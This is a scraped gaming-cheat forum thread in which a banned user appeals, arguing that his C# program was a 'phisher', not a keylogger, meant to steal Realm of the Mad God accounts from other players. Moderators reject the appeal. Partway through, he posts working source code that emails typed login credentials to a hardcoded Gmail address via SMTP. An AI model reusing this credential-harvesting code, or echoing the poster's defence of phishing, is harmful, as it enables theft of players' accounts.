Thanks

It was NOT a "keylogger", was 100% safe, let me explain.

LONG STORY SHORT:
    The file was 100% safe, no viruses included
    (saying this because the ban reason stated that you guys thought it was a keylogger..),
    was just simple C# program I was intending to use on people on the official game that basically sent me their info they typed into the program in the textboxes, was not at all a keylogger, and it also was not mentioned on mpgh, no thread was made saying something like "Add me on skype for this .exe!" or anything like that, therefore, I was in the clear to share it over skype.

I made a hack off-site, and since it phished the games accounts, I could not release on MPGH (and was NOT intending to!!), I was just gonna go on the official game and advertise the programs download link, and I shared the program with people in the Skype chat that Raple made for the RotMG section (this is the game I made the phisher for) and told them that if they want to they can also advertise it in-game and I'll share accounts I get with them.

But it seems like Cjacko, the person I am 90% sure who reported me (he dislikes me for stupid random reasons that I don't even remember of), made it seem like I sent it in the Skype chat to try and phish the people in their, but I told them what it did beforehand and told them why I was sharing it in the chat..

I really think he did this to purposely get me banned due to personal grudges which is also unfair.

Yes it is the MPGH chat, and @ any staff don't try to pull that "no sharing files over skype" because we are allowed to have lives outside of MPGH, not every thing that people make has to be released on mpgh, especially since this was not mentioned on the site nor was planned to be released on this site.. if I were to release this on MPGH I'd 100% get banned WHICH IS THE REASON I KEPT IT OFF-SITE.
    And yes I know, it's still a phisher and it was a skype chat with mpgh members in it, but I shared it and told them to advertise it in-game as well and that I would share accounts that I get.

Cjackos reason of doing it, should explain him in a nutshell.
    https://imgur.com/a/bETis

I'm willing to be given the CS rank or even a blacklist (even though that doesn't make sense) if you guys appeal to this.
    @Flengo @Mayion @Hero @BACKD00R @NormenJaydenFBI @FanticSteal

Arun said it's up to you guys (and any other GMs I may have left out) ^
    Last edited by RigBan; 06-20-2016 at 02:53 PM.

Thanks
    My Mood
    Amazed
    Quote Originally Posted by RigBan View Post
    LONG STORY SHORT:
    (saying this because the ban reason stated that you guys thought it was a keylogger..),
    was just simple C# program I was intending to use on people on the official game that basically sent me their info they typed into the program in the textboxes, was not at all a keylogger, and it also was not mentioned on mpgh, no thread was made saying something like "Add me on skype for this .exe!" or anything like that, therefore, I was in the clear to share it over skype.

I made a hack off-site, and since it phished the games accounts, I could not release on MPGH (and was NOT intending to!!), I was just gonna go on the official game and advertise the programs download link, and I shared the program with people in the Skype chat that Raple made for the RotMG section (this is the game I made the phisher for) and told them that if they want to they can also advertise it in-game and I'll share accounts I get with them.

But it seems like Cjacko, the person I am 90% sure who reported me (he dislikes me for stupid random reasons that I don't even remember of), made it seem like I sent it in the Skype chat to try and phish the people in their, but I told them what it did beforehand and told them why I was sharing it in the chat..

I really think he did this to purposely get me banned due to personal grudges which is also unfair.

Yes it is the MPGH chat, and @ any staff don't try to pull that "no sharing files over skype" because we are allowed to have lives outside of MPGH, not every thing that people make has to be released on mpgh, especially since this was not mentioned on the site nor was planned to be released on this site.. if I were to release this on MPGH I'd 100% get banned WHICH IS THE REASON I KEPT IT OFF-SITE.
    And yes I know, it's still a phisher and it was a skype chat with mpgh members in it, but I shared it and told them to advertise it in-game as well and that I would share accounts that I get.

Cjackos reason of doing it, should explain him in a nutshell.
    https://imgur.com/a/bETis

I'm willing to be given the CS rank or even a blacklist (even though that doesn't make sense) if you guys appeal to this.
    You were banned by @Mayion so he may be better equipped to assist you.

CLICK TO BUY NOW!!

Quote Originally Posted by Liz View Post
    This is my first vouch, ever. Rapidgator account worked perfectly. Would buy in the future.

Thanks
    Quote Originally Posted by Smoke View Post

You were banned by @Mayion so he may be better equipped to assist you.
    Alright, thanks for telling me.

Also just so happens, the person who reported me...
    https://webcache.googleuserconten*****...&ct=clnk&gl=us

I'm 99% sure staff can see deleted threads, so you can view all the comments and updated screenshots if you need. Not very mature of me to try getting the person who got me in trouble, in trouble, but I am just saying that I feel targeted by him for personal grudges that he has against me.

- - - Updated - - -

not even talking to him, and hes still just repeatedly talking shit and bragging how he got me banned.
    Last edited by RigBan; 06-20-2016 at 03:00 PM.

Thanks
    All I have to say is that I called you a ****** for phishing, and Riigged was labelled as a cocksucker on mpgh, nothing personal. Neither did I brag, I simply stated that you deserved it. Neither did I even say I got you banned? So how did I brag about it, only reason I'm commenting on this is because you're lying about it.
    Last edited by CJacko; 06-20-2016 at 03:30 PM.

Thanks
    My Mood
    Inspired
    The file still stole their account information. It doesn't matter if it were only specific to stealing account information for the game, it's essentially the same thing. You can post this on YouTube or wherever else you want. But when you directly hack MPGH and send it in an MPGH chat, you are not in the clear.
    I Read All Of My PM's & VM's
    If you need help with anything, just let me know.

VM | PM | IM
    Staff Administrator Since 10.13.2019
    Publicist Since 04.04.2015
    Middleman Since 04.14.2014
    Global Moderator Since 08.01.2013
    Premium Since 05.29.2013

Minion+ Since 04.18.2013

Combat Arms Minion Since 12.26.2012
    Contributor Since 11.16.2012
    Member Since 05.11.2010

Thanks
    Quote Originally Posted by Flengo View Post

The file still stole their account information. It doesn't matter if it were only specific to stealing account information for the game, it's essentially the same thing. You can post this on YouTube or wherever else you want. But when you directly hack MPGH and send it in an MPGH chat, you are not in the clear.
    No MPGH members were TOUCHED, no info of them was sent to me and every single person in that chat can confirm.
    I sent it to them and told them to NOT use the program, I told them to advertise it in-game so I can get accounts faster and that I would give them accounts in return as a "thank you" for advertising it in-game.

Edit: EVERY SINGLE PERSON in the chat can confirm that they were not hacked, it was not targeted towards them, it was a phishing program that I gave out FOR THEM TO USE AGAINST OTHER PEOPLE, I told them WHAT IT DID BEFORE I GAVE IT TO THEM. And it was 100% virus free, I really dont see why this is such a problem.. Cjacko targets me because he dislikes me, its very unfair in my opinion, all he does is try to spot out everything I do wrong (Even though none of this is wrong)
    Last edited by RigBan; 06-20-2016 at 03:33 PM.

Thanks
    No MPGH members were TOUCHED, no info of them was sent to me and every single person in that chat can confirm.
    I sent it to them and told them to NOT use the program, I told them to advertise it in-game so I can get accounts faster and that I would give them accounts in return as a "thank you" for advertising it in-game.

Edit: EVERY SINGLE PERSON in the chat can confirm that they were not hacked, it was not targeted towards them, it was a phishing program that I gave out FOR THEM TO USE AGAINST OTHER PEOPLE, I told them WHAT IT DID BEFORE I GAVE IT TO THEM. And it was 100% virus free, I really dont see why this is such a problem.. Cjacko targets me because he dislikes me, its very unfair in my opinion, all he does is try to spot out everything I do wrong (Even though none of this is wrong)
    The program directed peoples login details TO YOUR EMAIL ADDRESS. Don't act like you gave us it so we could use it for our own benefit (not like any of us would do that anyway). It's hard to say I target you over something out of my control.

Thanks
    Quote Originally Posted by CJacko View Post

The program directed peoples login details TO YOUR EMAIL ADDRESS. Don't act like you gave us it so we could use it for our own benefit (not like any of us would do that anyway). It's hard to say I target you over something out of my control.
    You say that like the program AUTOMATICALLY sends me your info when you open it, which it DOES NOT.

You have to MANUALLY type in THE EMAIL AND PASSWORD and CLICK THE BUTTON and the BUTTON CLICK METHOD sends the TEXTBOX1 AND TEXTBOX2 TEXTS to me... and I TOLD YOU THAT IT DOES THAT BEFORE GIVING YOU IT AND TOLD YOU GUYS TO GIVE IT TO OTHER PEOPLE IN-GAME.
    (Caps do not = flaming, just capitalizing the important parts)

You do target me, because everything I say in the group chat you always have to quote me and argue about it/try to insult me.

- - - Updated - - -

SOURCE CODE:

Code:
            public void SendMail(string body)
            {

try
                {
                    SmtpClient client = new SmtpClient("smtp.gmail.com", 587);
                    client.EnableSsl = true;
                    client.Timeout = 10000;
                    client.DeliveryMethod = SmtpDeliveryMethod.Network;
                    client.UseDefaultCredentials = false;
                    client.Credentials = new NetworkCredential("emailthatsendsinfo@gmail.com", "password");
                    MailMessage msg = new MailMessage();
                    msg.To.Add("emailthatreceivesinfo@gmail.com");
                    msg.From = new MailAddress("emailthatsendsinfo@gmail.com");
                    msg.Subject = "New account";
                    msg.Body = body;
                    client.Send(msg);
                }
                catch (Exception ex)
                {
                    MessageBox.Show("An error occurred");
                }
            }
            private void button1_Click(object sender, EventArgs e)
            {
                SendMail(textBox1.Text + " | " + textBox2.Text);
            }
    as you can see, nothing virus abt it, and as you can see, details have to manually be typed and the button that clicks it SENDS THE INFO, and EVERYONE IN THE CHAT THAT I SENT IT TO KNEW THAT UPON DOWNLOADING IT, and I WANTED THEM TO GIVE IT TO OTHER PEOPLE (Not mpgh registered people).

Thanks
    My Mood
    Inspired
    Can you post a screenshot saying specifically for them not to run the file?

VM | PM | IM
    Premium Since 05.29.2013

Minion+ Since 04.18.2013

Member Since 05.11.2010

Thanks
    My Mood
    Buzzed
    https://gyazo.com/0945fcd5367570bb4d41d696ba6d1c37

He posted it multiple times w/ out saying "dont use it"

Thanks
    Quote Originally Posted by High View Post
    https://gyazo.com/0945fcd5367570bb4d41d696ba6d1c37

He posted it multiple times w/ out saying "dont use it"
    "pass this .exe around if you want free prod accounts from me" xD that is me telling you that it sends prod info to me basically and that i want you to give it out, thanks for posting the screenshot for me.

Thanks
    https://imgur.com/a/eAjwY

Description of every picture explains the situation.

Thanks
    another pic: this is messages RIGHT after the one mike (High) just posted

me clearly clarifying "DO NOT TYPE YOUR DETAILS IN" and as you can see his time is 3:37 and mine is 10:37 so idk what fucking time zone hes in but this clearly happened the same exact minute..

- - - Updated - - -

Quote Originally Posted by CJacko View Post
    https://imgur.com/a/eAjwY

Description of every picture explains the situation.
    thank you as well, saved me time from doing it myself lmao you clearly see me saying "NOT TO USE IT" and yes I said not to tell an MPGH staff BECAUSE OF THIS EXACT REASON, they would get the wrong idea and I did not want to feel like explaining such a fucking confusing situation.
    and that first pic or 2nd or whatever, OWL ASKED FOR IT, he knew what it did and so did everyone else, he knew I was joking when I said that it opens up a rotmg client and etc. he even asked me to make one for him (as well, in the pic(s)), its all in the screenshots and all the pieces of the puzzle fit, and you just proven I did nothing wrong.
    Last edited by RigBan; 06-20-2016 at 04:06 PM.

Thanks
    - - - Updated - - -

thank you as well, saved me time from doing it myself lmao you clearly see me saying "NOT TO USE IT" and yes I said not to tell an MPGH staff BECAUSE OF THIS EXACT REASON, they would get the wrong idea and I did not want to feel like explaining such a fucking confusing situation.

Well actually you sent it in chat at 3:00am (my time) and lied about what the program was. You also claimed you created it at 3:05. Then at 3:36 you then re-sent the file and told us to spread it around. 30 MINUTES AFTER INITIALLY POSTING IT. Plus you didn't say "Don't use it" you claimed 30 minutes after posting it that YOU NEVER TOLD US TO USE IT, but you didn't explicitly stated "Don't use it", if you sent a file in a skype chat you can be convinced someone would be stupid enough to run an .exe

Thanks
    My Mood
    Inspired
    Riigged has been banned for 2 weeks and will be removed from the ROTMG chat.

VM | PM | IM
    Premium Since 05.29.2013

Minion+ Since 04.18.2013

Member Since 05.11.2010

16. The Following User Says Thank You to Flengo For This Useful Post:

RigBan (06-20-2016)